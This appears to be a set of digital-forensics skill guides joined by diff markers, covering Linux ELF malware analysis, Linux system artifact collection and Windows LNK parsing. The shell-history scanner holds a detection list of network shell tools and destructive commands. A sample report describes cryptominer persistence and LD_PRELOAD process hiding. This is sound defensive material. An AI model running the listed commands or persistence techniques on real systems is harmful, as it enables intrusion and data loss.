| Term | Definition |
|
||||
|------|------------|
|
||||
| **ELF (Executable and Linkable Format)** | Standard binary format for Linux executables, shared libraries, and core dumps containing headers, sections, and segments |
|
||||
| **Stripped Binary** | ELF binary with debug symbols removed, making reverse engineering more difficult as function names are lost |
|
||||
| **LD_PRELOAD** | Linux environment variable specifying shared libraries to load before all others; abused by rootkits to intercept system library calls |
|
||||
| **strace** | Linux system call tracer that logs all system calls and signals made by a process, revealing file, network, and process operations |
|
||||
| **GOT/PLT** | Global Offset Table and Procedure Linkage Table; ELF structures for dynamic linking that can be hijacked for function hooking |
|
||||
| **Statically Linked** | Binary compiled with all library code included; common in IoT malware to run on systems without matching shared libraries |
|
||||
| **Mirai** | Prolific Linux botnet targeting IoT devices via telnet brute-force; source code leaked, leading to many variants |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Ghidra**: NSA reverse engineering tool with full ELF support for x86, x86_64, ARM, MIPS, and other Linux architectures
|
||||
- **Radare2**: Open-source reverse engineering framework with command-line interface for quick binary analysis and scripting
|
||||
- **strace**: Linux system call tracing tool for observing binary behavior including file, network, and process operations
|
||||
- **GDB**: GNU Debugger for setting breakpoints, examining memory, and stepping through Linux binary execution
|
||||
- **pyelftools**: Python library for parsing ELF files programmatically for automated analysis pipelines
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Analyzing a Cryptominer Found on a Compromised Linux Server
|
||||
|
||||
**Context**: A cloud server shows 100% CPU usage. Investigation reveals an unknown binary running from /tmp with a suspicious name. The binary needs analysis to confirm it is a cryptominer and identify the attacker's wallet and pool.
|
||||
|
||||
**Approach**:
|
||||
1. Copy the binary to an analysis VM and compute SHA-256 hash
|
||||
2. Run `file` and `readelf` to identify architecture and linking type
|
||||
3. Extract strings and search for mining pool addresses (stratum+tcp://) and wallet addresses
|
||||
4. Run with strace in a sandbox to observe network connections (mining pool connection)
|
||||
5. Import into Ghidra to identify the mining algorithm and configuration extraction
|
||||
6. Check for persistence mechanisms (crontab, systemd service, SSH keys)
|
||||
7. Document all IOCs including pool address, wallet, C2 for updates, and persistence artifacts
|
||||
|
||||
**Pitfalls**:
|
||||
- Running `ldd` on malware outside a sandbox (ldd can execute code in the binary)
|
||||
- Not checking for ARM/MIPS architecture before attempting x86_64 execution
|
||||
- Missing companion scripts (.sh files) that may handle persistence and cleanup
|
||||
- Ignoring the initial access vector (how the miner was deployed: SSH brute force, web exploit, container escape)
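
To avoid the architecture pitfall above without running `file` or the sample itself, the ELF header can be read directly. This is a minimal sketch using only the standard library; `identify_elf` is a hypothetical helper and the machine table covers only a few common `e_machine` values from the ELF specification.

```python
import struct

EI_CLASS = {1: "32-bit", 2: "64-bit"}
EI_DATA = {1: "little-endian", 2: "big-endian"}
# Subset of e_machine values; anything else is reported by number.
E_MACHINE = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def identify_elf(header: bytes) -> dict:
    """Identify class, byte order, and architecture from the first 20 bytes of a file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] (EI_DATA) decides how the multi-byte fields are encoded
    endian = "<" if header[5] == 1 else ">"
    # e_type and e_machine follow the 16-byte e_ident array
    e_type, e_machine = struct.unpack_from(endian + "HH", header, 16)
    return {
        "class": EI_CLASS.get(header[4], "unknown"),
        "byte_order": EI_DATA.get(header[5], "unknown"),
        "machine": E_MACHINE.get(e_machine, f"unknown ({e_machine})"),
        "e_type": e_type,
    }
```

Usage would look like `identify_elf(open(path, "rb").read(20))`; a MIPS or ARM result means the sample needs an emulated or matching analysis environment rather than an x86_64 sandbox.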
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
LINUX ELF MALWARE ANALYSIS REPORT
|
||||
====================================
|
||||
File: /tmp/.X11-unix/.rsync
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
Type: ELF 64-bit LSB executable, x86-64
|
||||
Linking: Statically linked (all libraries embedded)
|
||||
Stripped: Yes
|
||||
Size: 2,847,232 bytes
|
||||
Packer: UPX 3.96 (unpacked for analysis)
|
||||
|
||||
CLASSIFICATION
|
||||
Family: XMRig Cryptominer (modified)
|
||||
Variant: Custom build with C2 update mechanism
|
||||
|
||||
FUNCTIONALITY
|
||||
[*] XMR (Monero) mining via RandomX algorithm
|
||||
[*] Stratum pool connection for work submission
|
||||
[*] C2 check-in for configuration updates
|
||||
[*] Process name masquerading (argv[0] = "[kworker/0:0]")
|
||||
[*] Competitor process killing (kills other miners)
|
||||
[*] SSH key injection for re-access
|
||||
|
||||
NETWORK INDICATORS
|
||||
Mining Pool: stratum+tcp://pool.minexmr[.]com:4444
|
||||
C2 Server: hxxp://update.malicious[.]com/config
|
||||
Wallet: 49jZ5Q3b...Monero_Wallet_Address...
|
||||
|
||||
PERSISTENCE
|
||||
[1] Crontab entry: */5 * * * * /tmp/.X11-unix/.rsync
|
||||
[2] SSH key added to /root/.ssh/authorized_keys
|
||||
[3] Systemd service: /etc/systemd/system/rsync-daemon.service
|
||||
[4] Modified /etc/ld.so.preload for process hiding
|
||||
|
||||
PROCESS HIDING
|
||||
LD_PRELOAD: /usr/lib/.libsystem.so
|
||||
Hook: readdir() to hide /tmp/.X11-unix/.rsync from ls
|
||||
Hook: fopen() to hide from /proc/*/maps reading
|
||||
```
|
||||
@@ -0,0 +1,320 @@
|
||||
---
|
||||
name: analyzing-linux-system-artifacts
|
||||
description: Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover evidence of compromise or unauthorized activity.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, linux-forensics, system-artifacts, log-analysis, persistence-detection, incident-investigation]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Linux System Artifacts
|
||||
|
||||
## When to Use
|
||||
- When investigating a compromised Linux server or workstation
|
||||
- For identifying persistence mechanisms (cron, systemd, SSH keys)
|
||||
- When tracing user activity through shell history and authentication logs
|
||||
- During incident response to determine the scope of a Linux-based breach
|
||||
- For detecting rootkits, backdoors, and unauthorized modifications
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or live access to the Linux system (read-only)
|
||||
- Understanding of Linux file system hierarchy (FHS)
|
||||
- Knowledge of common Linux logging locations (/var/log/)
|
||||
- Tools: chkrootkit, rkhunter, AIDE, auditd logs
|
||||
- Familiarity with systemd, cron, and PAM configurations
|
||||
- Root access for complete artifact collection
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Mount and Collect System Artifacts
|
||||
|
||||
```bash
|
||||
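# Mount forensic image read-only; noexec blocks execution from the image
# (for ext3/ext4 images, also add noload so the journal is not replayed)
mount -o ro,loop,noexec,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence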
|
||||
|
||||
# Create collection directories
|
||||
mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network,analysis}
|
||||
|
||||
# Collect authentication logs
|
||||
cp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/
|
||||
cp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/
|
||||
|
||||
# Collect user artifacts
|
||||
for user_dir in /mnt/evidence/home/*/; do
|
||||
username=$(basename "$user_dir")
|
||||
mkdir -p /cases/case-2024-001/linux/users/$username
|
||||
cp "$user_dir"/.bash_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.zsh_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp -r "$user_dir"/.ssh/ /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.bashrc /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.profile /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.viminfo /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.wget-hsts /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
cp "$user_dir"/.python_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null
|
||||
done
|
||||
|
||||
# Collect root user artifacts
|
||||
mkdir -p /cases/case-2024-001/linux/users/root
cp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null
|
||||
cp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null
|
||||
|
||||
# Collect system configuration
|
||||
cp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/
|
||||
cp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/
|
||||
cp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/
|
||||
cp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
|
||||
```
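
After collection it is common practice to hash every copied artifact so later analysis can show the working copies were not altered. The sketch below is an illustration under that assumption; `sha256_file` and `build_manifest` are hypothetical helper names, and the manifest format (relative path mapped to digest) is a choice made here, not something the skill prescribes.

```python
import hashlib
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large logs do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    return {
        str(path.relative_to(root)): sha256_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }
```

For the layout used in this step, `build_manifest(Path("/cases/case-2024-001/linux"))` would cover the logs, config, and users directories; the result can be written to the case notes with `json.dump`.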
|
||||
|
||||
### Step 2: Analyze User Accounts and Authentication
|
||||
|
||||
```bash
|
||||
# Analyze user accounts for anomalies
|
||||
python3 << 'PYEOF'
print("=== USER ACCOUNT ANALYSIS ===\n")

# Shells that do not permit an interactive login
NOLOGIN_SHELLS = ('/bin/false', '/usr/sbin/nologin', '/sbin/nologin', '/bin/sync')

# Parse /etc/passwd
with open('/cases/case-2024-001/linux/config/passwd') as f:
    for line in f:
        parts = line.strip().split(':')
        # Skip blank or malformed entries instead of crashing on int()
        if len(parts) < 7 or not parts[2].isdigit():
            continue
        username, uid, home, shell = parts[0], int(parts[2]), parts[5], parts[6]

        # Flag accounts with UID 0 (root equivalent)
        if uid == 0 and username != 'root':
            print(f"  ALERT: UID 0 account: {username} (shell: {shell})")

        # List regular users (UID >= 1000) that have a login shell
        if shell not in NOLOGIN_SHELLS and uid >= 1000:
            print(f"  User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")

        # Flag system accounts with login shells
        if 0 < uid < 1000 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
            print(f"  WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")

# Parse /etc/shadow for account status
print("\n=== PASSWORD STATUS ===")
with open('/cases/case-2024-001/linux/config/shadow') as f:
    for line in f:
        parts = line.strip().split(':')
        if len(parts) >= 3:
            username = parts[0]
            pwd_hash = parts[1]
            last_change = parts[2]

            # A leading '!' marks a locked password; the hash may still follow it
            locked = pwd_hash.startswith('!')
            pwd_hash = pwd_hash.lstrip('!')

            if pwd_hash and pwd_hash != '*':
                hash_type = 'Unknown'
                if pwd_hash.startswith('$6$'): hash_type = 'SHA-512'
                elif pwd_hash.startswith('$5$'): hash_type = 'SHA-256'
                elif pwd_hash.startswith('$y$'): hash_type = 'yescrypt'
                elif pwd_hash.startswith('$1$'): hash_type = 'MD5 (WEAK)'
                status = ' (LOCKED)' if locked else ''
                print(f"  {username}: {hash_type} hash{status}, last changed: day {last_change} since 1970-01-01")
PYEOF
|
||||
|
||||
# Analyze login history
|
||||
last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt
|
||||
lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
|
||||
```
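
The third field of `/etc/shadow` printed above is a day count since 1970-01-01, which is hard to read in a timeline. A small sketch of the conversion follows; `shadow_day_to_date` is a hypothetical helper, and treating `0` and empty values as "no date" follows the field's documented meaning in shadow(5).

```python
from datetime import date, timedelta
from typing import Optional


def shadow_day_to_date(last_change: str) -> Optional[date]:
    """Convert the shadow 'last password change' field to a calendar date."""
    # Empty means password aging is disabled; 0 means a change is forced at next login
    if not last_change.isdigit() or int(last_change) == 0:
        return None
    return date(1970, 1, 1) + timedelta(days=int(last_change))
```

A password change date that falls inside the suspected intrusion window, especially for root or a service account, is worth correlating with the authentication logs.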
|
||||
|
||||
### Step 3: Examine Persistence Mechanisms
|
||||
|
||||
```bash
|
||||
# Check cron jobs for all users
|
||||
echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
|
||||
# System cron
|
||||
for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do
|
||||
echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
done
|
||||
|
||||
# User crontabs (Debian/Ubuntu path; RHEL/CentOS stores them directly in /var/spool/cron/)
|
||||
for cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do
|
||||
echo "--- User crontab: $(basename $cronfile) ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
|
||||
done
|
||||
|
||||
# Check systemd services for persistence
|
||||
echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
|
||||
>> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
|
||||
for svc in /mnt/evidence/etc/systemd/system/*.service; do
|
||||
echo "--- $(basename $svc) ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
|
||||
done
|
||||
|
||||
# Check authorized SSH keys (backdoor detection)
|
||||
echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt
|
||||
find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" -exec sh -c \
'echo "--- $1 ---"; cat "$1"; echo ""' _ {} \; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt
|
||||
|
||||
# Check rc.local and init scripts
|
||||
cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt
|
||||
|
||||
# Check /etc/profile.d/ for login-triggered scripts
|
||||
ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt
|
||||
|
||||
# Check for LD_PRELOAD hijacking
|
||||
grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt
|
||||
cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
|
||||
```
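
Once the unit files are collected, a quick triage pass can flag services that launch binaries from world-writable or hidden locations. The following is a minimal sketch under assumptions made here: the list of suspicious directories and the helper name `suspicious_exec_lines` are illustrative, and a hit is a lead to review, not proof of compromise.

```python
import re

# Locations where legitimate services rarely keep their executables (assumed list)
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
EXEC_RE = re.compile(r"^\s*Exec\w+\s*=\s*(.+)$", re.M)


def suspicious_exec_lines(unit_text: str) -> list:
    """Return Exec* commands whose executable is in a suspicious or hidden path."""
    findings = []
    for match in EXEC_RE.finditer(unit_text):
        command = match.group(1).strip()
        # systemd allows special prefixes such as '-', '@', '+', '!' before the path
        tokens = command.lstrip("-@+!:").split()
        if not tokens:
            continue
        executable = tokens[0]
        hidden = any(part.startswith(".") for part in executable.split("/") if part)
        if executable.startswith(SUSPICIOUS_DIRS) or hidden:
            findings.append(command)
    return findings
```

Each `.service` file gathered in this step can be passed in as text, for example `suspicious_exec_lines(Path(svc).read_text(errors="ignore"))`.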
|
||||
|
||||
### Step 4: Analyze Shell History and Command Execution
|
||||
|
||||
```bash
|
||||
# Analyze bash history for each user
|
||||
python3 << 'PYEOF'
import glob

print("=== SHELL HISTORY ANALYSIS ===\n")

suspicious_commands = [
    'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',
    'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',
    'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',
    'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',
    'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',
    'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',
    'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'
]
# Lines are lowercased before matching, so the patterns must be lowercase too
# (otherwise 'iptables -F' can never match)
patterns = [cmd.lower() for cmd in suspicious_commands]

for hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):
    username = hist_file.split('/')[-2]
    print(f"User: {username}")

    with open(hist_file, 'r', errors='ignore') as f:
        lines = f.readlines()

    print(f"  Total commands: {len(lines)}")
    flagged = []
    for i, line in enumerate(lines):
        line = line.strip()
        # Record each line once, on its first matching pattern
        if any(pattern in line.lower() for pattern in patterns):
            flagged.append((i + 1, line))

    if flagged:
        print(f"  Suspicious commands: {len(flagged)}")
        for lineno, cmd in flagged:
            print(f"    Line {lineno}: {cmd[:120]}")
    print()
PYEOF
|
||||
```
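
When `HISTTIMEFORMAT` was set on the system, bash writes a `#<epoch seconds>` line before each command in `.bash_history`, which lets commands be placed on a timeline. A minimal sketch of pairing those markers with commands is shown below; `parse_bash_history` is a hypothetical helper, and it assumes one command per line (multi-line commands are not handled).

```python
from datetime import datetime, timezone


def parse_bash_history(lines):
    """Return (timestamp or None, command) pairs from .bash_history lines."""
    entries = []
    pending = None  # timestamp waiting for the command line that follows it
    for raw in lines:
        line = raw.rstrip("\n")
        if line.startswith("#") and line[1:].isdigit():
            pending = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        if line:
            entries.append((pending, line))
            pending = None
    return entries
```

Commands without a preceding marker come back with `None`, which is itself useful: a history file that mixes timestamped and untimestamped entries may have been edited or written under different shell settings.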
|
||||
|
||||
### Step 5: Check for Rootkits and Modified Binaries
|
||||
|
||||
```bash
|
||||
# Hash system binaries for later comparison against a known-good baseline
# (modified system binaries are a common rootkit indicator)
|
||||
find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \
|
||||
-type f -executable -exec sha256sum {} \; > /cases/case-2024-001/linux/analysis/binary_hashes.txt
|
||||
|
||||
# Check for SUID/SGID binaries (potential privilege escalation)
|
||||
find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt
|
||||
find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt
|
||||
|
||||
# Check for suspicious files in /tmp and /dev/shm
|
||||
find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \
|
||||
-exec file {} \; > /cases/case-2024-001/linux/analysis/tmp_files.txt
|
||||
|
||||
# Check for hidden files and directories
|
||||
find /mnt/evidence/ -type f -name ".*" 2>/dev/null | \
head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt
|
||||
|
||||
# Check kernel modules
|
||||
ls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \
|
||||
> /cases/case-2024-001/linux/analysis/extra_modules.txt
|
||||
|
||||
# Check for modified PAM configuration (authentication backdoors)
|
||||
diff -r /cases/baseline/pam.d/ /mnt/evidence/etc/pam.d/ 2>/dev/null \
|
||||
> /cases/case-2024-001/linux/analysis/pam_changes.txt
|
||||
```
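
The hash list produced above only becomes useful once it is compared with a baseline from a clean system of the same distribution and patch level. The sketch below assumes such a baseline exists in `sha256sum` output format; the helper names and the `strip_prefix` handling for the `/mnt/evidence` mount point are illustrative choices.

```python
def parse_sha256sum(text: str, strip_prefix: str = "") -> dict:
    """Parse sha256sum output into {path: digest}, optionally dropping a mount prefix."""
    hashes = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, path = parts
        path = path.lstrip("*")  # binary-mode marker used by sha256sum
        if strip_prefix and path.startswith(strip_prefix):
            path = "/" + path[len(strip_prefix):].lstrip("/")
        hashes[path] = digest.lower()
    return hashes


def compare_to_baseline(evidence: dict, baseline: dict) -> dict:
    """List binaries whose hash differs from, or is absent in, the baseline."""
    modified = sorted(p for p in evidence if p in baseline and evidence[p] != baseline[p])
    unknown = sorted(p for p in evidence if p not in baseline)
    return {"modified": modified, "unknown": unknown}
```

Entries under `modified` deserve the closest look; `unknown` entries are often just packages missing from the baseline, so they are better treated as leads than findings.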
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |
|
||||
| /var/log/secure | Primary authentication log on RHEL/CentOS systems |
|
||||
| wtmp/btmp | Binary logs recording successful and failed login sessions |
|
||||
| .bash_history | User command history file (can be cleared by attackers) |
|
||||
| crontab | Scheduled task system commonly used for persistence |
|
||||
| authorized_keys | SSH public keys granting passwordless access to an account |
|
||||
| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |
|
||||
| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| chkrootkit | Rootkit detection scanner for Linux systems |
|
||||
| rkhunter | Rootkit Hunter - checks for rootkits, backdoors, and local exploits |
|
||||
| AIDE | Advanced Intrusion Detection Environment - file integrity monitor |
|
||||
| auditd | Linux audit framework for system call and file access monitoring |
|
||||
| last/lastb | Parse wtmp/btmp for login and failed login history |
|
||||
| Plaso/log2timeline | Super-timeline creation including Linux artifacts |
|
||||
| osquery | SQL-based system querying for live forensic investigation |
|
||||
| Velociraptor | Endpoint agent with Linux artifact collection capabilities |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: SSH Brute Force Followed by Compromise**
|
||||
Analyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.
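
The "failed attempts followed by success" pattern in Scenario 1 can be sketched as a small log scan. This is a hedged illustration: the regular expressions match the common OpenSSH `Failed password` and `Accepted password/publickey` messages, while the function name and the threshold of five failures are assumptions made here.

```python
import re
from collections import Counter

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+)")


def find_bruteforce_successes(lines, min_failures: int = 5) -> list:
    """Return successful logins from IPs that already failed at least min_failures times."""
    failures = Counter()
    hits = []
    for line in lines:
        failed = FAILED_RE.search(line)
        if failed:
            failures[failed.group(2)] += 1
            continue
        accepted = ACCEPTED_RE.search(line)
        if accepted and failures[accepted.group(2)] >= min_failures:
            hits.append({
                "user": accepted.group(1),
                "ip": accepted.group(2),
                "prior_failures": failures[accepted.group(2)],
            })
    return hits
```

Feeding it the collected log, for example `find_bruteforce_successes(open("/cases/case-2024-001/linux/logs/auth.log", errors="ignore"))`, gives a short list of source IPs to pivot on in shell history and `authorized_keys`.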
|
||||
|
||||
**Scenario 2: Web Server Compromise via Application Vulnerability**
|
||||
Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.
|
||||
|
||||
**Scenario 3: Insider Threat on Database Server**
|
||||
Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.
|
||||
|
||||
**Scenario 4: Crypto-Miner on Cloud Instance**
|
||||
Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Linux Forensics Summary:
|
||||
System: webserver01 (Ubuntu 22.04 LTS)
|
||||
Hostname: webserver01.corp.local
|
||||
Kernel: 5.15.0-91-generic
|
||||
|
||||
User Accounts:
|
||||
Total: 25 (3 with UID 0 - 1 ANOMALOUS)
|
||||
Interactive shells: 8 users
|
||||
Recently created: admin2 (created 2024-01-15)
|
||||
|
||||
Authentication Events:
|
||||
Successful SSH logins: 456
|
||||
Failed SSH attempts: 12,345 (from 23 unique IPs)
|
||||
Sudo executions: 89
|
||||
|
||||
Persistence Mechanisms Found:
|
||||
Cron jobs: 3 suspicious (reverse shell, miner restart)
|
||||
Systemd services: 1 unknown (update-checker.service)
|
||||
SSH keys: 2 unauthorized keys in root authorized_keys
|
||||
rc.local: Modified with download cradle
|
||||
|
||||
Suspicious Activity:
|
||||
- bash_history contains wget to pastebin URL
|
||||
- SUID binary /tmp/.hidden/escalate found
|
||||
- /dev/shm/ contains compiled ELF binary
|
||||
- LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so
|
||||
|
||||
Report: /cases/case-2024-001/linux/analysis/
|
||||
```
|
||||
@@ -0,0 +1,191 @@
|
||||
---
|
||||
name: analyzing-lnk-file-and-jump-list-artifacts
|
||||
description: Analyze Windows LNK shortcut files and Jump List artifacts to establish evidence of file access, program execution, and user activity using LECmd, JLECmd, and manual binary parsing of the Shell Link Binary format.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [lnk-files, jump-lists, lecmd, jlecmd, windows-forensics, shell-link, user-activity, file-access, program-execution, recent-files]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing LNK File and Jump List Artifacts
|
||||
|
||||
## Overview
|
||||
|
||||
Windows LNK (shortcut) files and Jump Lists are critical forensic artifacts that provide evidence of file access, program execution, and user behavior. LNK files are created automatically when a user opens a file through Windows Explorer or the Open/Save dialog, storing metadata about the target file including its original path, timestamps, volume serial number, NetBIOS name, and MAC address of the host system. Jump Lists, introduced in Windows 7, extend this by maintaining per-application lists of recently and frequently accessed files. These artifacts persist even after the target files are deleted, making them invaluable for establishing that a user accessed specific files at specific times.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- LECmd (Eric Zimmerman) for LNK file parsing
|
||||
- JLECmd (Eric Zimmerman) for Jump List parsing
|
||||
- Python 3.8+ with pylnk3 or LnkParse3 libraries
|
||||
- Forensic image or triage collection from Windows system
|
||||
- Timeline Explorer for CSV analysis
|
||||
|
||||
## LNK File Locations
|
||||
|
||||
| Location | Description |
|
||||
|----------|-------------|
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\` | Recent files accessed |
|
||||
| `%USERPROFILE%\Desktop\` | User-created shortcuts |
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\` | Start Menu shortcuts |
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Office\Recent\` | Office recent documents |
|
||||
|
||||
## LNK File Structure
|
||||
|
||||
### Shell Link Header (76 bytes)
|
||||
|
||||
| Offset | Size | Field |
|
||||
|--------|------|-------|
|
||||
| 0x00 | 4 | HeaderSize (always 0x0000004C) |
|
||||
| 0x04 | 16 | LinkCLSID (always 00021401-0000-0000-C000-000000000046) |
|
||||
| 0x14 | 4 | LinkFlags |
|
||||
| 0x18 | 4 | FileAttributes |
|
||||
| 0x1C | 8 | CreationTime (FILETIME) |
|
||||
| 0x24 | 8 | AccessTime (FILETIME) |
|
||||
| 0x2C | 8 | WriteTime (FILETIME) |
|
||||
| 0x34 | 4 | FileSize of target |
|
||||
| 0x38 | 4 | IconIndex |
|
||||
| 0x3C | 4 | ShowCommand |
|
||||
| 0x40 | 2 | HotKey |
|
||||
|
||||
### Key Forensic Fields in LNK Files
|
||||
|
||||
- **Target file timestamps**: Creation, access, modification times of the referenced file
|
||||
